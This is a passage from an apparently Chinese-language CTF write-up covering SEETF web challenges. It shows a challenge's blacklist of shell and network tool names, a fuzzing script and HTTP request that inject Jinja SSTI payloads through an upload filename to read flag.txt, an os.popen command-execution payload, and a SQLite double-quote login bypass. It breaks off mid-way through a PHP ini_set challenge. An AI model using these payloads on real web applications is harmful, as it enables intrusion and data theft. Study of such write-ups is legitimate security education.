class="string">&#x27;capsh&#x27;</span>, <span class="string">&#x27;cat&#x27;</span>, <span class="string">&#x27;cdist&#x27;</span>, <span class="string">&#x27;certbot&#x27;</span>, <span class="string">&#x27;check_by_ssh&#x27;</span>, <span class="string">&#x27;check_cups&#x27;</span>, <span class="string">&#x27;check_log&#x27;</span>, <span class="string">&#x27;check_memory&#x27;</span>, <span class="string">&#x27;check_raid&#x27;</span>, <span class="string">&#x27;check_ssl_cert&#x27;</span>, <span class="string">&#x27;check_statusfile&#x27;</span>, <span class="string">&#x27;chmod&#x27;</span>, <span class="string">&#x27;choom&#x27;</span>, <span class="string">&#x27;chown&#x27;</span>, <span class="string">&#x27;chroot&#x27;</span>, <span class="string">&#x27;cmp&#x27;</span>, <span class="string">&#x27;cobc&#x27;</span>, <span class="string">&#x27;column&#x27;</span>, <span class="string">&#x27;comm&#x27;</span>, <span class="string">&#x27;comm &#x27;</span>, <span class="string">&#x27;composer&#x27;</span>, <span class="string">&#x27;cowsay&#x27;</span>, <span class="string">&#x27;cowthink&#x27;</span>, <span class="string">&#x27;cpan&#x27;</span>, <span class="string">&#x27;cpio&#x27;</span>, <span class="string">&#x27;cpulimit&#x27;</span>, <span class="string">&#x27;crash&#x27;</span>, <span class="string">&#x27;crontab&#x27;</span>, <span class="string">&#x27;csh&#x27;</span>, <span class="string">&#x27;csplit&#x27;</span>, <span class="string">&#x27;csvtool&#x27;</span>, <span class="string">&#x27;cupsfilter&#x27;</span>, <span class="string">&#x27;curl&#x27;</span>, <span class="string">&#x27;cut&#x27;</span>, <span class="string">&#x27;dash&#x27;</span>, <span class="string">&#x27;date&#x27;</span>, <span class="string">&#x27;debug&#x27;</span>, <span class="string">&#x27;debugfs&#x27;</span>, <span class="string">&#x27;dialog&#x27;</span>, <span class="string">&#x27;diff&#x27;</span>, <span class="string">&#x27;dig&#x27;</span>, <span class="string">&#x27;dir&#x27;</span>, <span class="string">&#x27;distcc&#x27;</span>, <span class="string">&#x27;dmesg&#x27;</span>, <span class="string">&#x27;dmidecode&#x27;</span>, <span class="string">&#x27;dmsetup&#x27;</span>, <span class="string">&#x27;dnf&#x27;</span>, <span class="string">&#x27;docker&#x27;</span>, <span class="string">&#x27;dos2unix&#x27;</span>, <span class="string">&#x27;dosbox&#x27;</span>, <span class="string">&#x27;dotnet&#x27;</span>, <span class="string">&#x27;dpkg&#x27;</span>, <span class="string">&#x27;dstat&#x27;</span>, <span class="string">&#x27;dvips&#x27;</span>, <span class="string">&#x27;easy_install&#x27;</span>, <span class="string">&#x27;echo&#x27;</span>, <span class="string">&#x27;efax&#x27;</span>, <span class="string">&#x27;elvish&#x27;</span>, <span class="string">&#x27;emacs&#x27;</span>, <span class="string">&#x27;env&#x27;</span>, <span class="string">&#x27;eqn&#x27;</span>, <span class="string">&#x27;espeak&#x27;</span>, <span class="string">&#x27;exiftool&#x27;</span>, <span class="string">&#x27;expand&#x27;</span>, <span class="string">&#x27;expect&#x27;</span>, <span class="string">&#x27;facter&#x27;</span>, <span class="string">&#x27;file&#x27;</span>, <span class="string">&#x27;find&#x27;</span>, <span class="string">&#x27;finger&#x27;</span>, <span class="string">&#x27;fish&#x27;</span>, <span class="string">&#x27;flock&#x27;</span>, <span class="string">&#x27;fmt&#x27;</span>, <span class="string">&#x27;fold&#x27;</span>, <span class="string">&#x27;fping&#x27;</span>, <span class="string">&#x27;ftp&#x27;</span>, <span class="string">&#x27;gawk&#x27;</span>, <span class="string">&#x27;gcc&#x27;</span>, <span class="string">&#x27;gcloud&#x27;</span>, <span class="string">&#x27;gcore&#x27;</span>, <span class="string">&#x27;gdb&#x27;</span>, <span class="string">&#x27;gem&#x27;</span>, <span class="string">&#x27;genie&#x27;</span>, <span class="string">&#x27;genisoimage&#x27;</span>, <span class="string">&#x27;ghc&#x27;</span>, <span class="string">&#x27;ghci&#x27;</span>, <span class="string">&#x27;gimp&#x27;</span>, <span class="string">&#x27;ginsh&#x27;</span>, <span class="string">&#x27;git&#x27;</span>, <span class="string">&#x27;grc&#x27;</span>, <span class="string">&#x27;grep&#x27;</span>, <span class="string">&#x27;gtester&#x27;</span>, <span class="string">&#x27;gzip&#x27;</span>, <span class="string">&#x27;head&#x27;</span>, <span class="string">&#x27;hexdump&#x27;</span>, <span class="string">&#x27;highlight&#x27;</span>, <span class="string">&#x27;hping3&#x27;</span>, <span class="string">&#x27;iconv&#x27;</span>, <span class="string">&#x27;ifconfig&#x27;</span>, <span class="string">&#x27;iftop&#x27;</span>, <span class="string">&#x27;install&#x27;</span>, <span class="string">&#x27;ionice&#x27;</span>, <span class="string">&#x27;irb&#x27;</span>, <span class="string">&#x27;ispell&#x27;</span>, <span class="string">&#x27;jjs&#x27;</span>, <span class="string">&#x27;joe&#x27;</span>, <span class="string">&#x27;join&#x27;</span>, <span class="string">&#x27;journalctl&#x27;</span>, <span class="string">&#x27;jrunscript&#x27;</span>, <span class="string">&#x27;jtag&#x27;</span>, <span class="string">&#x27;julia&#x27;</span>, <span class="string">&#x27;knife&#x27;</span>, <span class="string">&#x27;ksh&#x27;</span>, <span class="string">&#x27;ksshell&#x27;</span>, <span class="string">&#x27;ksu&#x27;</span>, <span class="string">&#x27;kubectl&#x27;</span>, <span class="string">&#x27;latex&#x27;</span>, <span class="string">&#x27;latexmk&#x27;</span>, <span class="string">&#x27;ld.so&#x27;</span>, <span class="string">&#x27;ldconfig&#x27;</span>, <span class="string">&#x27;less&#x27;</span>, <span class="string">&#x27;less &#x27;</span>, <span class="string">&#x27;lftp&#x27;</span>, <span class="string">&#x27;loginctl&#x27;</span>, <span class="string">&#x27;logsave&#x27;</span>, <span class="string">&#x27;look&#x27;</span>, <span class="string">&#x27;ltrace&#x27;</span>, <span class="string">&#x27;lua&#x27;</span>, <span class="string">&#x27;lualatex&#x27;</span>, <span class="string">&#x27;luatex&#x27;</span>, <span class="string">&#x27;lwp-download&#x27;</span>, <span class="string">&#x27;lwp-request&#x27;</span>, <span class="string">&#x27;mail&#x27;</span>, <span class="string">&#x27;make&#x27;</span>, <span class="string">&#x27;man&#x27;</span>, <span class="string">&#x27;mawk&#x27;</span>, <span class="string">&#x27;more&#x27;</span>, <span class="string">&#x27;mosquitto&#x27;</span>, <span class="string">&#x27;mount&#x27;</span>, <span class="string">&#x27;msfconsole&#x27;</span>, <span class="string">&#x27;msgattrib&#x27;</span>, <span class="string">&#x27;msgcat&#x27;</span>, <span class="string">&#x27;msgconv&#x27;</span>, <span class="string">&#x27;msgfilter&#x27;</span>, <span class="string">&#x27;msgmerge&#x27;</span>, <span class="string">&#x27;msguniq&#x27;</span>, <span class="string">&#x27;mtr&#x27;</span>, <span class="string">&#x27;multitime&#x27;</span>, <span class="string">&#x27;mysql&#x27;</span>, <span class="string">&#x27;nano&#x27;</span>, <span class="string">&#x27;nasm&#x27;</span>, <span class="string">&#x27;nawk&#x27;</span>, <span class="string">&#x27;ncftp&#x27;</span>, <span class="string">&#x27;neofetch&#x27;</span>, <span class="string">&#x27;netstat&#x27;</span>, <span class="string">&#x27;nft&#x27;</span>, <span class="string">&#x27;nice&#x27;</span>, <span class="string">&#x27;nmap&#x27;</span>, <span class="string">&#x27;node&#x27;</span>, <span class="string">&#x27;nohup&#x27;</span>, <span class="string">&#x27;npm&#x27;</span>, <span class="string">&#x27;nroff&#x27;</span>, <span class="string">&#x27;nsenter&#x27;</span>, <span class="string">&#x27;nslookup&#x27;</span>, <span class="string">&#x27;octave&#x27;</span>, <span class="string">&#x27;openssl&#x27;</span>, <span class="string">&#x27;openvpn&#x27;</span>, <span class="string">&#x27;openvt&#x27;</span>, <span class="string">&#x27;opkg&#x27;</span>, <span class="string">&#x27;pandoc&#x27;</span>, <span class="string">&#x27;paste&#x27;</span>, <span class="string">&#x27;pax&#x27;</span>, <span class="string">&#x27;pdb&#x27;</span>, <span class="string">&#x27;pdflatex&#x27;</span>, <span class="string">&#x27;pdftex&#x27;</span>, <span class="string">&#x27;perf&#x27;</span>, <span class="string">&#x27;perl&#x27;</span>, <span class="string">&#x27;perlbug&#x27;</span>, <span class="string">&#x27;pexec&#x27;</span>, <span class="string">&#x27;php&#x27;</span>, <span class="string">&#x27;pic&#x27;</span>, <span class="string">&#x27;pico&#x27;</span>, <span class="string">&#x27;pidstat&#x27;</span>, <span class="string">&#x27;ping&#x27;</span>, <span class="string">&#x27;pip&#x27;</span>, <span class="string">&#x27;pkexec&#x27;</span>, <span class="string">&#x27;pkg&#x27;</span>, <span class="string">&#x27;posh&#x27;</span>, <span class="string">&#x27;pry&#x27;</span>, <span class="string">&#x27;psftp&#x27;</span>, <span class="string">&#x27;psql&#x27;</span>, <span class="string">&#x27;ptx&#x27;</span>, <span class="string">&#x27;puppet&#x27;</span>, <span class="string">&#x27;pwsh&#x27;</span>, <span class="string">&#x27;rake&#x27;</span>, <span class="string">&#x27;readelf&#x27;</span>, <span class="string">&#x27;red&#x27;</span>, <span class="string">&#x27;redcarpet&#x27;</span>, <span class="string">&#x27;redis&#x27;</span>, <span class="string">&#x27;restic&#x27;</span>, <span class="string">&#x27;rev&#x27;</span>, <span class="string">&#x27;rlogin&#x27;</span>, <span class="string">&#x27;rlwrap&#x27;</span>, <span class="string">&#x27;route&#x27;</span>, <span class="string">&#x27;rpm&#x27;</span>, <span class="string">&#x27;rpmdb&#x27;</span>, <span class="string">&#x27;rpmquery&#x27;</span>, <span class="string">&#x27;rpmverify&#x27;</span>, <span class="string">&#x27;rsync&#x27;</span>, <span class="string">&#x27;rtorrent&#x27;</span>, <span class="string">&#x27;ruby&#x27;</span>, <span class="string">&#x27;run-mailcap&#x27;</span>, <span class="string">&#x27;run-parts&#x27;</span>, <span class="string">&#x27;rview&#x27;</span>, <span class="string">&#x27;rvim&#x27;</span>, <span class="string">&#x27;sash&#x27;</span>, <span class="string">&#x27;scanmem&#x27;</span>, <span class="string">&#x27;scp&#x27;</span>, <span class="string">&#x27;screen&#x27;</span>, <span class="string">&#x27;script&#x27;</span>, <span class="string">&#x27;scrot&#x27;</span>, <span class="string">&#x27;sed&#x27;</span>, <span class="string">&#x27;service&#x27;</span>, <span class="string">&#x27;setarch&#x27;</span>, <span class="string">&#x27;setfacl&#x27;</span>, <span class="string">&#x27;setlock&#x27;</span>, <span class="string">&#x27;sftp&#x27;</span>, <span class="string">&#x27;shuf&#x27;</span>, <span class="string">&#x27;slsh&#x27;</span>, <span class="string">&#x27;smbclient&#x27;</span>, <span class="string">&#x27;snap&#x27;</span>, <span class="string">&#x27;socat&#x27;</span>, <span class="string">&#x27;socket&#x27;</span>, <span class="string">&#x27;soelim&#x27;</span>, <span class="string">&#x27;softlimit&#x27;</span>, <span class="string">&#x27;sort&#x27;</span>, <span class="string">&#x27;split&#x27;</span>, <span class="string">&#x27;sqlite3&#x27;</span>, <span class="string">&#x27;sqlmap&#x27;</span>, <span class="string">&#x27;ssh&#x27;</span>, <span class="string">&#x27;ssh-agent&#x27;</span>, <span class="string">&#x27;ssh-keygen&#x27;</span>, <span class="string">&#x27;ssh-keyscan&#x27;</span>, <span class="string">&#x27;sshpass&#x27;</span>, <span class="string">&#x27;start-stop-daemon&#x27;</span>, <span class="string">&#x27;stdbuf&#x27;</span>, <span class="string">&#x27;strace&#x27;</span>, <span class="string">&#x27;strings&#x27;</span>, <span class="string">&#x27;sysctl&#x27;</span>, <span class="string">&#x27;systemctl&#x27;</span>, <span class="string">&#x27;systemd-resolve&#x27;</span>, <span class="string">&#x27;tac&#x27;</span>, <span class="string">&#x27;tail&#x27;</span>, <span class="string">&#x27;tar&#x27;</span>, <span class="string">&#x27;task&#x27;</span>, <span class="string">&#x27;taskset&#x27;</span>, <span class="string">&#x27;tasksh&#x27;</span>, <span class="string">&#x27;tbl&#x27;</span>, <span class="string">&#x27;tclsh&#x27;</span>, <span class="string">&#x27;tcpdump&#x27;</span>, <span class="string">&#x27;tdbtool&#x27;</span>, <span class="string">&#x27;tee&#x27;</span>, <span class="string">&#x27;telnet&#x27;</span>, <span class="string">&#x27;tex&#x27;</span>, <span class="string">&#x27;tftp&#x27;</span>, <span class="string">&#x27;time&#x27;</span>, <span class="string">&#x27;timedatectl&#x27;</span>, <span class="string">&#x27;timeout&#x27;</span>, <span class="string">&#x27;tmate&#x27;</span>, <span class="string">&#x27;tmux&#x27;</span>, <span class="string">&#x27;top&#x27;</span>, <span class="string">&#x27;torify&#x27;</span>, <span class="string">&#x27;torsocks&#x27;</span>, <span class="string">&#x27;touch&#x27;</span>, <span class="string">&#x27;traceroute&#x27;</span>, <span class="string">&#x27;troff&#x27;</span>, <span class="string">&#x27;truncate&#x27;</span>, <span class="string">&#x27;tshark&#x27;</span>, <span class="string">&#x27;unexpand&#x27;</span>, <span class="string">&#x27;uniq&#x27;</span>, <span class="string">&#x27;unshare&#x27;</span>, <span class="string">&#x27;unzip&#x27;</span>, <span class="string">&#x27;update-alternatives&#x27;</span>, <span class="string">&#x27;uudecode&#x27;</span>, <span class="string">&#x27;uuencode&#x27;</span>, <span class="string">&#x27;vagrant&#x27;</span>, <span class="string">&#x27;valgrind&#x27;</span>, <span class="string">&#x27;view&#x27;</span>, <span class="string">&#x27;vigr&#x27;</span>, <span class="string">&#x27;vim&#x27;</span>, <span class="string">&#x27;vimdiff&#x27;</span>, <span class="string">&#x27;vipw&#x27;</span>, <span class="string">&#x27;virsh&#x27;</span>, <span class="string">&#x27;volatility&#x27;</span>, <span class="string">&#x27;w3m&#x27;</span>, <span class="string">&#x27;wall&#x27;</span>, <span class="string">&#x27;watch&#x27;</span>, <span class="string">&#x27;wget&#x27;</span>, <span class="string">&#x27;whiptail&#x27;</span>, <span class="string">&#x27;whois&#x27;</span>, <span class="string">&#x27;wireshark&#x27;</span>, <span class="string">&#x27;wish&#x27;</span>, <span class="string">&#x27;xargs&#x27;</span>, <span class="string">&#x27;xdotool&#x27;</span>, <span class="string">&#x27;xelatex&#x27;</span>, <span class="string">&#x27;xetex&#x27;</span>, <span class="string">&#x27;xmodmap&#x27;</span>, <span class="string">&#x27;xmore&#x27;</span>, <span class="string">&#x27;xpad&#x27;</span>, <span class="string">&#x27;xxd&#x27;</span>, <span class="string">&#x27;yarn&#x27;</span>, <span class="string">&#x27;yash&#x27;</span>, <span class="string">&#x27;yelp&#x27;</span>, <span class="string">&#x27;yum&#x27;</span>, <span class="string">&#x27;zathura&#x27;</span>, <span class="string">&#x27;zip&#x27;</span>, <span class="string">&#x27;zsh&#x27;</span>, <span class="string">&#x27;zsoelim&#x27;</span>, <span class="string">&#x27;zypper&#x27;</span>]</span><br><span class="line">        </span><br><span class="line"></span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> l1:</span><br><span class="line">            <span class="keyword">if</span> i <span class="keyword">in</span> template.lower():</span><br><span class="line">                print(template, i, file=sys.stderr)</span><br><span class="line">                template = <span class="string">&quot;nice try&quot;</span></span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">        matches = re.findall(<span class="string">r&quot;[&#x27;\&quot;](.*?)[&#x27;\&quot;]&quot;</span>, template)</span><br><span class="line">        <span class="keyword">for</span> match <span class="keyword">in</span> matches:</span><br><span class="line">            print(match, file=sys.stderr)</span><br><span class="line">            <span class="keyword">if</span> <span class="keyword">not</span> re.match(<span class="string">r&#x27;^[a-zA-Z0-9 \/\.\-]+$&#x27;</span>, match):</span><br><span class="line">                template = <span class="string">&quot;nice try&quot;</span></span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            <span class="keyword">for</span> i <span class="keyword">in</span> l2:</span><br><span class="line">                <span class="keyword">if</span> i <span class="keyword">in</span> match.lower():</span><br><span class="line">                    print(i, file=sys.stderr)</span><br><span class="line">                    template = <span class="string">&quot;nice try&quot;</span></span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">return</span> render_template_string(template)</span><br></pre></td></tr></table></figure>
<p>绕过他的黑名单即可</p>
<p>参考：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/9584#toc-3">https://xz.aliyun.com/t/9584#toc-3</a></p>
<p>fuzz类的索引</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&#x27;http://172.21.28.13:29384/upload&#x27;</span></span><br><span class="line">headers = &#123;</span><br><span class="line">    <span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;multipart/form-data; boundary=----WebKitFormBoundarymTsANkoKLXBfBT6f&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;Cookie&#x27;</span>: <span class="string">&#x27;session=eyJleHQiOm51bGwsInV1aWQiOiJmY2RmNmE3Yi05ODE1LTQwMWYtYjg1Yy04Y2Y2NDIwZGRiZDAifQ.ZIYSxA.aOmD_eFJ9hZm2YAJdrdH5Ttw15o&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;&#123;% print([].__class__.__bases__[0].__subclasses__()[num]) %&#125;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">300</span>):</span><br><span class="line">    payload = <span class="string">&#x27;&#123;% print([].__class__.__bases__[0].__subclasses__()[&#x27;</span>+<span class="built_in">str</span>(i)+<span class="string">&#x27;]) %&#125;&#x27;</span></span><br><span class="line">    data = <span class="string">f&#x27;&#x27;&#x27;------WebKitFormBoundarymTsANkoKLXBfBT6f</span></span><br><span class="line"><span class="string">Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;<span class="subst">&#123;payload&#125;</span>&quot;</span></span><br><span class="line"><span class="string">Content-Type: text/plain</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">import re</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">------WebKitFormBoundarymTsANkoKLXBfBT6f--</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">    response = requests.post(url, headers=headers, data=data)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;_frozen_importlib_external.FileLoader&quot;</span> <span class="keyword">in</span> response.text:</span><br><span class="line">        print(response.text)</span><br><span class="line">        print(data)</span><br><span class="line">        <span class="keyword">break</span></span><br></pre></td></tr></table></figure>
<p>读取<code>flag.txt</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">POST &#x2F;upload HTTP&#x2F;1.1</span><br><span class="line">Host: fu1.web.seetf.sg:1337</span><br><span class="line">Content-Length: 268</span><br><span class="line">Cache-Control: max-age&#x3D;0</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Origin: http:&#x2F;&#x2F;fu1.web.seetf.sg:1337</span><br><span class="line">Content-Type: multipart&#x2F;form-data; boundary&#x3D;----WebKitFormBoundaryfagSoQabs4E19Bx8</span><br><span class="line">User-Agent: Mozilla&#x2F;5.0 (Windows NT 10.0; Win64; x64) AppleWebKit&#x2F;537.36 (KHTML, like Gecko) Chrome&#x2F;112.0.0.0 Safari&#x2F;537.36</span><br><span class="line">Accept: text&#x2F;xml,application&#x2F;xhtml+xml,application&#x2F;xml;q&#x3D;0.9,image&#x2F;avif,image&#x2F;webp,image&#x2F;apng,*&#x2F;*;q&#x3D;0.8,application&#x2F;signed-exchange;v&#x3D;b3;q&#x3D;0.7</span><br><span class="line">Referer: http:&#x2F;&#x2F;fu1.web.seetf.sg:1337&#x2F;</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q&#x3D;0.9</span><br><span class="line">Cookie: session&#x3D;eyJleHQiOm51bGwsInV1aWQiOiJhNWExZDRiNC1jMWM3LTQ2YjctYjgxYy0xYjE2YTU0NzE1YmUifQ.ZIYRIw.Se2LPlx0m2oSU42i8_Mz0VjC6kw</span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line">------WebKitFormBoundaryfagSoQabs4E19Bx8</span><br><span class="line">Content-Disposition: form-data; name&#x3D;&quot;file&quot;; filename&#x3D;&quot;&#123;% print([].__class__.__bases__[0].__subclasses__()[99].get_data(0, &#39;flag.txt&#39;)) %&#125;&quot;</span><br><span class="line">Content-Type: text&#x2F;plain</span><br><span class="line"></span><br><span class="line">import re</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">------WebKitFormBoundaryfagSoQabs4E19Bx8--</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612205043988.png" alt="image-20230612205043988"></p>
<h2 id="file-uploader-2"><a href="#file-uploader-2" class="headerlink" title="file uploader 2"></a>file uploader 2</h2><p>存在漏洞的地方</p>
<p>会渲染我们上传的文件</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/uploads/&lt;path:path&gt;&#x27;</span></span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">viewfile</span>(<span class="params">path</span>):</span></span><br><span class="line">    <span class="keyword">if</span> session[<span class="string">&#x27;filename&#x27;</span>] == path:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            <span class="keyword">return</span> render_template(<span class="string">&#x27;static&#x27;</span>+<span class="string">&#x27;/&#x27;</span>+path)</span><br><span class="line">        <span class="keyword">except</span>:</span><br><span class="line">            <span class="keyword">return</span> send_from_directory(UPLOAD_FOLDER, path)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;profile&#x27;</span>))</span><br></pre></td></tr></table></figure>
<p>我们只需要构造恶意内容文件，将其上传即可进行类似ssti的操作</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;g.pop.__globals__.__builtins__[&#39;__import__&#39;](&#39;os&#39;).popen(&#39;cat i*&#39;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>但是在上传文件之前，需要我们进行登录，进行sql查询之前对query进行拼接，但是限制了传入的字符串只能包含大小写字母，数字，花括号，下划线。不能通过闭合引号来进行注入</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login</span>():</span></span><br><span class="line">    <span class="keyword">if</span> request.method == <span class="string">&#x27;POST&#x27;</span>:</span><br><span class="line">        username = request.form[<span class="string">&#x27;username&#x27;</span>]</span><br><span class="line">        password = request.form[<span class="string">&#x27;password&#x27;</span>]</span><br><span class="line">        pattern = <span class="string">r&#x27;[^a-zA-Z0-9&#123;_&#125;]&#x27;</span></span><br><span class="line">        <span class="keyword">if</span> re.search(pattern, username) <span class="keyword">or</span> re.search(pattern, password):</span><br><span class="line">            <span class="keyword">return</span> render_template(<span class="string">&#x27;login.html&#x27;</span>, error=<span class="string">&#x27;Sus input detected!&#x27;</span>)</span><br><span class="line">        </span><br><span class="line">        query = <span class="string">f&#x27;SELECT * FROM users WHERE dXNlcm5hbWVpbmJhc2U2NA = &quot;<span class="subst">&#123;username&#125;</span>&quot; AND cGFzc3dvcmRpbmJhc2U2NA = &quot;<span class="subst">&#123;password&#125;</span>&quot;;&#x27;</span></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            <span class="keyword">if</span> cur.execute(query).fetchone():</span><br><span class="line">                print(<span class="string">&quot;Login successful!&quot;</span>)</span><br><span class="line">                session[<span class="string">&#x27;usersess&#x27;</span>] = <span class="built_in">str</span>(uuid.uuid4())</span><br><span class="line">                session[<span class="string">&#x27;filename&#x27;</span>] = <span class="literal">None</span></span><br><span class="line">                <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;profile&#x27;</span>))</span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                <span class="keyword">raise</span> Exception(<span class="string">&#x27;Invalid Credentials. Please try again.&#x27;</span>)</span><br><span class="line">        <span class="keyword">except</span>:</span><br><span class="line">            error = <span class="string">&#x27;Invalid Credentials. Please try again.&#x27;</span></span><br><span class="line">            <span class="keyword">return</span> render_template(<span class="string">&#x27;login.html&#x27;</span>, error=error)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> render_template(<span class="string">&#x27;login.html&#x27;</span>)</span><br></pre></td></tr></table></figure>
<p>有意思的是在 <code>sqlite3</code> 中，单引号和双引号具有不同的含义，一个指的是一个字符串，另一个指的是一个标识符，一个标识符可以是一个列名，所以它变成像列名=列名</p>
<p><a target="_blank" rel="noopener" href="https://www.sqlite.org/lang_keywords.html">https://www.sqlite.org/lang_keywords.html</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/T@$IP18LFCP7Z~T59RIQPUW.png" alt="T@$IP18LFCP7Z~T59RIQPUW"></p>
<p>只要我们输入的账号密码和<code>users</code>的字段名对上了即可。</p>
<p>登录成功后，上传文件，然后访问文件即可触发<code>ssti</code>执行任意命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">登录：password&#x3D;cGFzc3dvcmRpbmJhc2U2NA&amp;username&#x3D;dXNlcm5hbWVpbmJhc2U2NA</span><br><span class="line"></span><br><span class="line">echo &quot;&#123;&#123;g.pop.__globals__.__builtins__[&#39;__import__&#39;](&#39;os&#39;).popen(&#39;cat i*&#39;).read()&#125;&#125;&quot; &gt; 5744f76c-33cd-48d9-8305-8893d0c5b2e1.png</span><br><span class="line"></span><br><span class="line">上传图片，访问 uploads&#x2F;5744f76c-33cd-48d9-8305-8893d0c5b2e1.png 触发ssti</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612205228720.png" alt="image-20230612205228720"></p>
<h2 id="Sourceful-Guessless-Web"><a href="#Sourceful-Guessless-Web" class="headerlink" title="Sourceful Guessless Web"></a>Sourceful Guessless Web</h2><p>本地搭建环境</p>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612200724129.png" alt="image-20230612200724129"></p>
<p>在这题中我们可以进行任意次的<code>ini_set($key, $value);</code></p>
<p>设置一个phpinfo();</p>
<p>看一下php的配置</p>
<p>刚开始看的是</p>
<p><strong>auto_prepend_file</strong></p>
<p><strong>auto_append_file</strong></p>
<p>发现这两个配置不能通过<code>ini_set</code>设置</p>
<p><img src="https://cdn.jsdelivr.net/gh/L1aovo/blogpic@main/img/image-20230612201823714.png" alt="image-20230612201823714"></p>
<p>后面往<code>log</code>这方面看，发现可以设置日志文件，但是并没有产生日志文件，并且网站目录root可写，文件落地方案失败</p>
<p>继续往下看 看到 <code>pcre</code> 方面，可以设置<strong>pcre.backtrack_limit</strong>和<strong>pcre.recursion_limit</strong></p>
<p>不认识的配置项直接问chatgpt（很省时间）</p>
